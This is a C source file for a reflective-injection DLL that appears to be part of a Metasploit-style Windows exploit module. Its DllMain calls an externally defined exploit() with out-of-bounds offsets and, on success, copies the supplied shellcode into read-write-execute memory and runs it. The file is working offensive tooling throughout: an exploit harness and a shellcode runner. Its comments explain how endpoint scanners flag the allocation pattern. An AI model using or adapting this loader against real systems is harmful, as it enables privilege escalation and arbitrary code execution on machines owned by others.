#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
#include "ReflectiveLoader.c"
#include <stdio.h>
#include <windows.h>
int exploit(unsigned int xleft_offset, unsigned int oob_offset);
/*
 * Descriptor the DLL receives through DllMain's lpReserved argument
 * (beginexploit() casts lpReserved to PMSF_PAYLOAD).
 *
 * The layout is fixed: three DWORD fields followed by a 0x1000-byte
 * buffer. Whoever fills in the descriptor controls every field,
 * including dwSize.
 */
typedef struct _MSF_PAYLOAD {
    DWORD dwxLeftOffset;        /* forwarded to exploit() as xleft_offset */
    DWORD dwOOBOffset;          /* forwarded to exploit() as oob_offset */
    DWORD dwSize;               /* byte count runpayload() hands to executepayload() */
    CHAR  cPayloadData[0x1000]; /* payload bytes; capacity is 0x1000 */
} MSF_PAYLOAD, *PMSF_PAYLOAD;
/*
 * Copy `size` bytes from `payload` into a newly committed region and call
 * the start of that region as a function taking no arguments.
 *
 * The region is requested as PAGE_EXECUTE_READWRITE, i.e. writable and
 * executable at the same time. A private RWX allocation that is written
 * and then called is a sequence memory scanners and endpoint tooling
 * hooking VirtualAlloc commonly flag.
 *
 * `payload` is not checked for NULL and `size` is not bounded here.
 * The region is not released on any path.
 *
 * Returns -1 when VirtualAlloc fails, 0 once the copied code returns.
 */
int executepayload(void * payload, size_t size)
{
    typedef void (*entry_fn)();
    LPVOID region = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    if (region == NULL) {
        return -1;
    }

    memcpy(region, payload, size);

    /* Control transfers into the copied bytes; nothing below runs unless they return. */
    ((entry_fn)region)();

    return 0;
}
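/*
 * Run the payload bytes carried in a MSF_PAYLOAD descriptor.
 *
 * Returns -1 when the descriptor is NULL or when its dwSize is larger than
 * the embedded cPayloadData buffer; otherwise returns executepayload()'s
 * result.
 */
int runpayload(PMSF_PAYLOAD pMsfPayload)
{
    if (!pMsfPayload) {
        return -1;
    }

    /*
     * dwSize comes from whoever filled in the descriptor. Without this
     * bound, a value above sizeof(cPayloadData) makes the memcpy in
     * executepayload() read past the end of the struct.
     */
    if (pMsfPayload->dwSize > sizeof(pMsfPayload->cPayloadData)) {
        return -1;
    }

    /* The array decays to a pointer to its first byte (same address as &array). */
    return executepayload(pMsfPayload->cPayloadData, pMsfPayload->dwSize);
}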
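/*
 * Entry routine invoked from DllMain on DLL_PROCESS_ATTACH.
 *
 * Interprets lpReserved as a MSF_PAYLOAD descriptor, calls exploit() with
 * the descriptor's two offsets, and runs the embedded payload only when
 * exploit() returns 0. exploit() is declared in this file but defined
 * elsewhere.
 */
void beginexploit(LPVOID lpReserved)
{
    PMSF_PAYLOAD payload = (PMSF_PAYLOAD)lpReserved;

    /*
     * DllMain forwards lpReserved unchanged, and it can be NULL (the
     * DLL_QUERY_HMODULE case already guards for that). Bail out instead of
     * dereferencing a NULL descriptor.
     */
    if (payload == NULL) {
        return;
    }

    if (!exploit(payload->dwxLeftOffset, payload->dwOOBOffset))
    {
        runpayload(payload);
    }
}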
/*
 * DLL entry point. Dispatches on dwReason and always returns TRUE.
 *
 * DLL_QUERY_HMODULE, DLL_METASPLOIT_ATTACH and hAppInstance are not
 * declared in this file; presumably they come from the included
 * ReflectiveLoader.c (REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN is defined
 * before that include).
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason)
    {
    case DLL_PROCESS_ATTACH:
        /* The exploit attempt and payload run synchronously inside this attach notification. */
        hAppInstance = hinstDLL;
        beginexploit(lpReserved);
        break;

    case DLL_QUERY_HMODULE:
        /* Report this module's handle through lpReserved when the caller supplied a slot for it. */
        hAppInstance = hinstDLL;
        if (lpReserved != NULL)
        {
            *(HMODULE*)lpReserved = hAppInstance;
        }
        break;

    /* No work is done for any of the remaining notifications. */
    case DLL_METASPLOIT_ATTACH:
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    default:
        break;
    }

    return TRUE;
}